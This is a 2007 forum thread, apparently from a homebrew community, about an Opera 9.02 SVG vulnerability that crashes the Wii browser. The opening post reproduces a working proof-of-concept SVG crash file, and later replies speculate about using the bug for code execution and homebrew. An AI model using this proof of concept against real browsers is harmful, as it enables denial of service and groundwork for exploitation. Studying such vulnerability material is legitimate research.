PDA

View Full Version : Opera Exploit on Nintendo Wii


wraggster
January 7th, 2007, 18:30
Could this be a way in for the hackers, heres the details (http://www.thehumancircus.org/):


There's a new Opera vulnerability out for 9.02 (the version the Wii runs) that it appears the wii is susceptible to as well. The vulnerability disclosure is here (http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=458)

Test it out here. This will crash your Wii. Browse your wii to this site and then click this link (http://www.thehumancircus.org/test.svg)

The code was created by Jumper and is as follows:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg id="mySVG" width="100%" height="100%" version="1.1"
xmlns="http://www.w3.org/2000/svg">

<rect width="300" height="100"
style="fill:rgb(0,0,255);stroke-width:1;
stroke:rgb(0,0,0)"/>

<script>
var svg = document.getElementById("mySVG");
var matrix = svg.createSVGMatrix();
var i=0xffffffff, randomObject = {a:i,b:i,c:i,d:i,e:i,f:i};

try{
svg.createSVGTransformFromMatrix(matrix);
}catch(e){}
try{
svg.createSVGTransformFromMatrix(randomObject);
}catch(e){}
try{
svg.createSVGTransformFromMatrix(null);
}catch(e){}
try{
svg.createSVGTransformFromMatrix(i);
}catch(e){}
try{
svg.createSVGTransformFromMatrix(new Array(i));
}catch(e){}
</script>

</svg>
Junixx
January 7th, 2007, 18:55
I've had problems with the Wii crashing using the shop channel sometimes
Dbgtgoten
January 7th, 2007, 21:35
I've had my whole wii freeze up and crash when randomly surfing for a while. Dun know maybe you could overload the cache or buffer to create a exploit?
shadowprophet
January 8th, 2007, 04:39
Its not like I predicted this about two weeks ago or anything :p
mcvader
January 8th, 2007, 04:50
is this really an exploit or just a complicated way to crash you're wii? I'm looking forward to see what becomes of this.
Dbgtgoten
January 8th, 2007, 06:12
Well on the site it says "Exploitation of this vulnerability would allow an attacker to execute arbitrary code on the affected host" so you know if someone were able to take that it might open a backdoor of somekind since you can run arbitrary code on the affected host. But again we need a proof of concept. So hopefully someone looks into this :o
Nicko01
January 9th, 2007, 01:25
Opera Buffer Overflow!!!!
Just like the Tiff overflow for psp. It just crashed the psp. until someone figured it out.
I believe the Wii will be easy to hack.
The internet browser was the first thing i though of when i got my wii. Internet browsers are hacked easily due to the fact that people hack them often. And in consoles, they can't make someone update it. then, HOMEBREW!!!
oh yea!!!
first we need to get this hack done and then make it add a homebrew channel.
an eloader type of thing maybe.
I hope that would work